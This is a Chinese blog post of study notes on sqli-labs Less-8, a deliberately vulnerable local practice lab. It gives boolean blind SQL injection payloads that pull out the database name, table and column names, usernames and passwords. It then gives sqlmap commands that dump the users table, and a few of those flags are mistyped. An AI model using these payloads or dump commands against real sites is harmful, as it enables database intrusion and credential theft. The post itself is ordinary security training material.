本系列笔记的内容及灵感来源于csdn上众多优秀文章,均为本人在自己练习中所看过并受益的,还有一些群聊里老哥们的解读。本人目前也是菜鸟一枚,文中若有错误或不合理的地方,读者们敬请斧正。
如涉及侵权则删除文章,笔记只是个人学习记录及分享,只做学习交流
请诸位网安人熟读网络安全法,切勿触碰法律底线,否则后果自负!
第八关
先判断是否存在sql注入
http://127.0.0.1/sqli-labs-master/Less-8/?id=1
http://127.0.0.1/sqli-labs-master/Less-8/?id=1'
http://127.0.0.1/sqli-labs-master/Less-8/?id=1"
只有单引号时无回显,存在sql注入
判断是字符型还是数字型
http://127.0.0.1/sqli-labs-master/Less-8/?id=1 and 1=1
http://127.0.0.1/sqli-labs-master/Less-8/?id=1 and 1=2 //数字型
127.0.0.1/sqli-labs-master/Less-8/?id=1' and '1'='1
127.0.0.1/sqli-labs-master/Less-8/?id=1' and '1'='2 //字符型
单引号字符型注入
判断闭合条件
结合上述测试,可推得为单引号闭合
查看源码
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";判断表列
?id=1' order by 3 --+
?id=1' order by 4 --+
布尔盲注
爆出数据库长度
?id=1'and length((select database()))=7--+
?id=1'and length((select database()))=8--+
爆出数据库名
试出第一个字母为115=s
?id=1'and ascii(substr((select database()),1,1))=115--+
爆出表名
确定第一个表的名称
第一个字母为e=101
?id=1' and (ascii(substr(( select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1)))=101--+
各个表名与长度
爆出列名
使用语句依次查询出users下各个列名
例句中为,查询第五列的第一个字母为u
?id=1' and (ascii(substr((select column_name from information_schema.columns where table_name='users' limit 4,1),1,1)))=117 --+
爆出用户名和密码
从 “users” 表中选择 “username” 字段的值。“limit 0,1” 表示只取第一条记录(这里是从第 0 个记录开始,也就是第一条记录)所以这个内层查询的目标就是获取 “users” 表中第一条记录的 “username” 字段值。
?id=1' and (ascii(substr(( select username from users limit 0,1),1,1)))>1--+
?id=1' and (ascii(substr(( select password from users limit 0,1),1,1)))>1--+
Sqlmap注入方式
爆库
python sqlmap.py -u "http://127.0.0.1/sqli-labs-master/Less-8/?id=1" –dbs
爆表
python sqlmap.py -u "http://127.0.0.1/sqli-labs-master/Less-8/?id=1" -D security -tables
爆列
python sqlmap.py -u "http://127.0.0.1/sqli-labs-master/Less-8/?id=1" -D security -T users -columns
爆字段
python sqlmap.py -u "http://127.0.0.1/sqli-labs-master/Less-8/?id=1" -D security -T users -C username,password -dump
第八关完
若对其中一些知识点有疑问或不解的地方,可查看作者前几关的笔记,其中较为详细地列出了其中的知识点。
标签:知识点,Less,0.1,labs,sqli,master,Sqli,id From: https://blog.csdn.net/2302_78453772/article/details/144147470